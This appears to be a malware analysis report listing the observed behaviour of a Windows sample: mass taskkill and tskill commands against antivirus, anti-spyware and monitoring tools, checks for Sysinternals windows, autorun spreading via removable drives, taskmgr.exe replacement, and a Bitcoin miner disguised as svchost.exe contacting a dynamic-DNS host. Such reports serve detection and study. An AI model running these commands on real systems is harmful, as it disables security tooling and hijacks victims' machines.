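Technical Information

Note: the group headings of this behaviour report are missing from this copy, so the entries below run together as one flat list; the reading given here is inferred from the entries themselves.
- The taskkill.exe, tskill.exe and net.exe / net1.exe stop entries, together with the bare process names such as AVGCTRL.EXE, target antivirus, anti-spyware and network-capture tools as well as regedit, msconfig and taskmgr, so the sample appears to be disabling defensive and administrative tooling.
- 'PROCMON_WINDOW_CLASS', 'RegMonClass' and 'FileMonClass' are the window classes of Sysinternals Process Monitor, Regmon and Filemon, which suggests a check for analysis tools.
- The autorun.inf and SandiskU3.exe entries on removable media suggest spreading via removable drives.
- The svchost.exe command line carrying a mine3.btcguild.com:8332 URL looks like a Bitcoin-mining client run under a system process name.
- The /pid= values belong to the analysed run only and are not reusable as indicators.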
- <SYSTEM32>\dllcache\taskmgr.exe with <SYSTEM32>\dllcache\taskmgr.exe.new
- <SYSTEM32>\taskmgr.exe with <SYSTEM32>\taskmgr.exe.new
- <Drive name for removable media>:\autorun.inf
- <Drive name for removable media>:\SandiskU3.exe
- <SYSTEM32>\tskill.exe /A f-prot
- <SYSTEM32>\taskkill.exe /f /im etrustcipe.exe
- <SYSTEM32>\tskill.exe /A etrustcipe
- <SYSTEM32>\taskkill.exe /f /im f-stopw.exe
- <SYSTEM32>\tskill.exe /A f-stopw
- <SYSTEM32>\taskkill.exe /f /im f-prot.exe
- <SYSTEM32>\taskkill.exe /f /im espwatch.exe
- <SYSTEM32>\taskkill.exe /f /im escanhtn.exe
- <SYSTEM32>\tskill.exe /A escanhnt
- <SYSTEM32>\taskkill.exe /f /im ecengine.exe
- <SYSTEM32>\tskill.exe /A espwatch
- <SYSTEM32>\taskkill.exe /f /im escanv95.exe
- <SYSTEM32>\tskill.exe /A escanv95
- <SYSTEM32>\taskkill.exe /f /im mcagent.exe
- <SYSTEM32>\tskill.exe /A mcagent
- <SYSTEM32>\taskkill.exe /f /im mapisvc32.exe
- <SYSTEM32>\tskill.exe /A mcshield
- <SYSTEM32>\taskkill.exe /f /im mcmnhdlr.exe
- <SYSTEM32>\tskill.exe /A mcmnhdlr
- <SYSTEM32>\tskill.exe /A mapisvc32
- <SYSTEM32>\taskkill.exe /f /im guarddog.exe
- <SYSTEM32>\tskill.exe /A guard
- <SYSTEM32>\taskkill.exe /f /im guard
- <SYSTEM32>\taskkill.exe /f /im icmon.exe
- <SYSTEM32>\tskill.exe /A icmon
- <SYSTEM32>\tskill.exe /A guarddog
- <SYSTEM32>\tskill.exe /A ecengine
- <SYSTEM32>\taskkill.exe /f /im wireshark.exe
- <SYSTEM32>\tskill.exe /A wireshark
- <SYSTEM32>\taskkill.exe /f /im connectionmonitor.exe
- <SYSTEM32>\tskill.exe /A cmesys
- <SYSTEM32>\taskkill.exe /f /im cmgrdian.exe
- <SYSTEM32>\tskill.exe /A cmgrdian
- <SYSTEM32>\tskill.exe /A connectionmonitor
- <SYSTEM32>\tskill.exe /A click
- <SYSTEM32>\taskkill.exe /f /im cleanpc.exe
- <SYSTEM32>\tskill.exe /A cleanpc
- <SYSTEM32>\taskkill.exe /f /im ctrl.exe
- <SYSTEM32>\tskill.exe /A ctrl
- <SYSTEM32>\taskkill.exe /f /im click.exe
- <SYSTEM32>\tskill.exe /A ethereal
- <SYSTEM32>\taskkill.exe /f /im defalert.exe
- <SYSTEM32>\tskill.exe /A defalert
- <SYSTEM32>\taskkill.exe /f /im esafe.exe
- <SYSTEM32>\tskill.exe /A esafe
- <SYSTEM32>\taskkill.exe /f /im ethereal.exe
- <SYSTEM32>\taskkill.exe /f /im deputy.exe
- <SYSTEM32>\taskkill.exe /f /im defwatch.exe
- <SYSTEM32>\tskill.exe /A defwatch
- <SYSTEM32>\taskkill.exe /f /im cmesys.exe
- <SYSTEM32>\tskill.exe /A deputy
- <SYSTEM32>\taskkill.exe /f /im defscangui.exe
- <SYSTEM32>\tskill.exe /A defscangui
- <SYSTEM32>\tskill.exe /f /im md.exe
- <SYSTEM32>\tskill.exe /f /im mcvsrte.exe
- <SYSTEM32>\tskill.exe /pid=3060
- <SYSTEM32>\taskkill.exe /pid=4908
- <SYSTEM32>\tskill.exe /pid=5864
- <SYSTEM32>\tskill.exe /pid=1360
- <SYSTEM32>\tskill.exe /pid=3364
- <SYSTEM32>\tskill.exe /f /im defscangui.exe
- <SYSTEM32>\taskkill.exe /A defscangui
- <SYSTEM32>\tskill.exe /f /im clean.exe
- <SYSTEM32>\tskill.exe /pid=5580
- <SYSTEM32>\tskill.exe /pid=4172
- <SYSTEM32>\tskill.exe /f /im esafe.exe
- <SYSTEM32>\tskill.exe /f /im _avpm
- <SYSTEM32>\tskill.exe /pid=5032
- <SYSTEM32>\tskill.exe /f /im _avpcc.exe
- <SYSTEM32>\taskkill.exe /pid=1172
- <SYSTEM32>\tskill.exe /f /im avgctrl.exe
- <SYSTEM32>\tskill.exe /pid=2776
- <SYSTEM32>\tskill.exe /pid=1284
- <SYSTEM32>\tskill.exe stop aawservice
- <SYSTEM32>\tskill.exe /pid=4740
- <SYSTEM32>\taskkill.exe /pid=4508
- <SYSTEM32>\taskkill.exe /pid=808
- <SYSTEM32>\tskill.exe /pid=4628
- <SYSTEM32>\tskill.exe /f /im avp.exe
- <SYSTEM32>\tskill.exe /pid=4736
- <SYSTEM32>\taskkill.exe /f /im md.exe
- <SYSTEM32>\tskill.exe /A mcvsshld
- <SYSTEM32>\taskkill.exe /f /im mcvsshld.exe
- <SYSTEM32>\tskill.exe /A monitor
- <SYSTEM32>\taskkill.exe /f /im monitor.exe
- <SYSTEM32>\tskill.exe /A md
- <SYSTEM32>\taskkill.exe /f /im mcvsrte.exe
- <SYSTEM32>\tskill.exe /A mctool
- <SYSTEM32>\taskkill.exe /f /im mctool.exe
- <SYSTEM32>\taskkill.exe /f /im mcshield.exe
- <SYSTEM32>\tskill.exe /A mcvsrte
- <SYSTEM32>\tskill.exe /A mcupdate
- <SYSTEM32>\taskkill.exe /f /im mcupdate.exe
- <SYSTEM32>\taskkill.exe /f /im nprotect.exe
- <SYSTEM32>\tskill.exe /A nprotect
- <SYSTEM32>\taskkill.exe /f /im notstart.exe
- <SYSTEM32>\taskkill.exe /pid=4560
- <SYSTEM32>\taskkill.exe /pid=4604
- <SYSTEM32>\cmd.exe /c C:\Users\Public\cpx.bat
- <SYSTEM32>\tskill.exe /A notstart
- <SYSTEM32>\tskill.exe /A normist
- <SYSTEM32>\taskkill.exe /f /im nod32.exe
- <SYSTEM32>\tskill.exe /A nod32
- <SYSTEM32>\taskkill.exe /f /im norton*.exe
- <SYSTEM32>\tskill.exe /A norton*
- <SYSTEM32>\taskkill.exe /f /im normist.exe
- <SYSTEM32>\taskkill.exe /f /im threatwork.exe
- <SYSTEM32>\tskill.exe /A Ad-Aware
- <SYSTEM32>\taskkill.exe /f /im Ad-Aware.exe
- <SYSTEM32>\tskill.exe /A avp
- <SYSTEM32>\taskkill.exe /f /im avp.exe
- <SYSTEM32>\tskill.exe /A threatwork
- <SYSTEM32>\net.exe stop aawservice
- <SYSTEM32>\taskkill.exe /f /im AAWService.exe
- <SYSTEM32>\tskill.exe /A mbam
- <SYSTEM32>\taskkill.exe /f /im mbam.exe
- <SYSTEM32>\tskill.exe /A AAWTray
- <SYSTEM32>\taskkill.exe /f /im AAWTray.exe
- <SYSTEM32>\tskill.exe /A AAWService
- <SYSTEM32>\tskill.exe /A _avpm
- <SYSTEM32>\taskkill.exe /f /im SUPERAntiSpyware.exe
- <SYSTEM32>\tskill.exe /A SUPERAntiSpyware
- <SYSTEM32>\tskill.exe /A agentsvr
- <SYSTEM32>\tskill.exe /A alertsvc
- <SYSTEM32>\taskkill.exe /f /im _avpm
- <SYSTEM32>\taskkill.exe /f /im _avpcc.exe
- <SYSTEM32>\taskkill.exe /f /im MSASCui.exe
- <SYSTEM32>\tskill.exe /A MSASCui
- <SYSTEM32>\net1.exe stop aawservice
- <SYSTEM32>\tskill.exe /A _avpcc
- <SYSTEM32>\taskkill.exe /f /im _avp32.exe
- <SYSTEM32>\tskill.exe /A _avp32
- <SYSTEM32>\tskill.exe /A Update
- <SYSTEM32>\cmd.exe /c C:\Users\Public\instmnr.bat
- <SYSTEM32>\taskkill.exe /f /im regedit.exe
- <SYSTEM32>\taskkill.exe /f /im <Virus name>.exe
- <SYSTEM32>\taskkill.exe /f /im msconfig.exe
- <SYSTEM32>\tskill.exe /A msconfig
- <SYSTEM32>\tskill.exe /A <Virus name>
- <SYSTEM32>\tskill.exe /A regedit
- <SYSTEM32>\cmd.exe /c C:\Users\Public\aiasodjfapughaw.bat
- <SYSTEM32>\tskill.exe /A smxss
- <SYSTEM32>\cmd.exe /c C:\mkxxosrw.bat
- <SYSTEM32>\taskkill.exe /f /im taskmgr.exe
- <SYSTEM32>\taskkill.exe /f /im smxss.exe
- <SYSTEM32>\tskill.exe /A taskmgr
- <SYSTEM32>\tskill.exe /A SpybotSD
- <SYSTEM32>\taskkill.exe /f /im SpybotSD.exe
- <SYSTEM32>\tskill.exe /A TeaTimer
- <SYSTEM32>\taskkill.exe /f /im Update.exe
- <SYSTEM32>\tskill.exe /A SUpdate
- <SYSTEM32>\taskkill.exe /f /im SUpdate.exe
- <SYSTEM32>\taskkill.exe /f /im TeaTimer.exe
- <SYSTEM32>\tskill.exe /A ccleaner
- <SYSTEM32>\taskkill.exe /f /im fuckyou.exe
- <SYSTEM32>\tskill.exe /A fuckyou
- <SYSTEM32>\svchost.exe -T 98 -o http://Je############uckerhead:x@mine3.btcguild.com:8332/
- <SYSTEM32>\cmd.exe /c C:\Users\Public\load.bat
- <SYSTEM32>\taskkill.exe /f /im ccleaner.exe
- <SYSTEM32>\taskkill.exe /f /im avltmain.exe
- <SYSTEM32>\tskill.exe /A avltmain
- <SYSTEM32>\taskkill.exe /f /im avkwctl9.exe
- <SYSTEM32>\tskill.exe /A blackice
- <SYSTEM32>\taskkill.exe /f /im avwin.exe
- <SYSTEM32>\tskill.exe /A avwin
- <SYSTEM32>\tskill.exe /A avkwctl9
- <SYSTEM32>\tskill.exe /A avkserv
- <SYSTEM32>\taskkill.exe /f /im avkpop.exe
- <SYSTEM32>\tskill.exe /A avkpop
- <SYSTEM32>\taskkill.exe /f /im avkservice.exe
- <SYSTEM32>\tskill.exe /A avkservice
- <SYSTEM32>\taskkill.exe /f /im avkserv.exe
- <SYSTEM32>\tskill.exe /A cleaner
- <SYSTEM32>\taskkill.exe /f /im clean.exe
- <SYSTEM32>\tskill.exe /A clean
- <SYSTEM32>\taskkill.exe /f /im cleaner3.exe
- <SYSTEM32>\tskill.exe /A cleaner3
- <SYSTEM32>\taskkill.exe /f /im cleaner.exe
- <SYSTEM32>\taskkill.exe /f /im bd_professional.exe
- <SYSTEM32>\taskkill.exe /f /im bidef.exe
- <SYSTEM32>\tskill.exe /A bidef
- <SYSTEM32>\taskkill.exe /f /im blackice.exe
- <SYSTEM32>\tskill.exe /A bd_professional
- <SYSTEM32>\taskkill.exe /f /im bidserver.exe
- <SYSTEM32>\tskill.exe /A bidserver
- <SYSTEM32>\taskkill.exe /f /im avgw.exe
- <SYSTEM32>\tskill.exe /A avgcc32
- <SYSTEM32>\taskkill.exe /f /im ave32.exe
- <SYSTEM32>\tskill.exe /A ave32
- <SYSTEM32>\taskkill.exe /f /im avgctrl.exe
- <SYSTEM32>\tskill.exe /A avgctrl
- <SYSTEM32>\taskkill.exe /f /im avgcc32.exe
- <SYSTEM32>\taskkill.exe /f /im avconsol.exe
- <SYSTEM32>\taskkill.exe /f /im amon9x.exe
- <SYSTEM32>\tskill.exe /A amon9x
- <SYSTEM32>\taskkill.exe /f /im agentsvr.exe
- <SYSTEM32>\tskill.exe /A avconsol
- <SYSTEM32>\taskkill.exe /f /im autotrace.exe
- <SYSTEM32>\tskill.exe /A autotrace
- <SYSTEM32>\taskkill.exe /f /im avgserv9.exe
- <SYSTEM32>\tskill.exe /A avgserv9
- <SYSTEM32>\taskkill.exe /f /im avgserv.exe
- <SYSTEM32>\tskill.exe /A avgw
- <SYSTEM32>\taskkill.exe /f /im avguard.exe
- <SYSTEM32>\tskill.exe /A avguard
- <SYSTEM32>\tskill.exe /A avgserv
- <SYSTEM32>\tskill.exe /A avgnt
- <SYSTEM32>\taskkill.exe /f /im avgemc.exe
- <SYSTEM32>\tskill.exe /A avgemc
- <SYSTEM32>\taskkill.exe /f /im avgrsx.exe
- <SYSTEM32>\tskill.exe /A avgrsx
- <SYSTEM32>\taskkill.exe /f /im avgnt.exe
- <SYSTEM32>\net.exe
- <SYSTEM32>\taskkill.exe
- <SYSTEM32>\tskill.exe
- AVGCTRL.EXE
- GUARD.EXE
- MCAGENT.EXE
- nod32.exe
- AVGCTRL.EXE
- AVP.COM
- AVP.EXE
- AVGCC32.EXE
- ClassName: 'PROCMON_WINDOW_CLASS' WindowName: ''
- ClassName: 'RegMonClass' WindowName: ''
- ClassName: 'FileMonClass' WindowName: ''
- C:\Users\Public\ar.i
- C:\Users\Public\load.bat
- C:\Users\Public\ojgasog.bat
- C:\autorun.inf
- C:\SandiskU3.exe
- C:\Users\Public\cpx.bat
- C:\Users\Public\instlx9xz7b8x.txt
- C:\mkxxosrw.bat
- %ALLUSERSPROFILE%\Application Data\TEMP:D56FBB0B
- C:\Users\Public\instmnr.bat
- C:\Users\Public\smxss.exe
- C:\Users\Public\aiasodjfapughaw.bat
- C:\Users\Public\ar.i
- <SYSTEM32>\fuckyou.exe
- C:\Users\Public\smxss.exe
- from <SYSTEM32>\taskmgr.exe to <SYSTEM32>\fuckyou.exe
- 'jb###.zapto.org':21
- 'localhost':1035
- DNS ASK jb###.zapto.org
- ClassName: '' WindowName: ''
- ClassName: 'MS_WINHELP' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''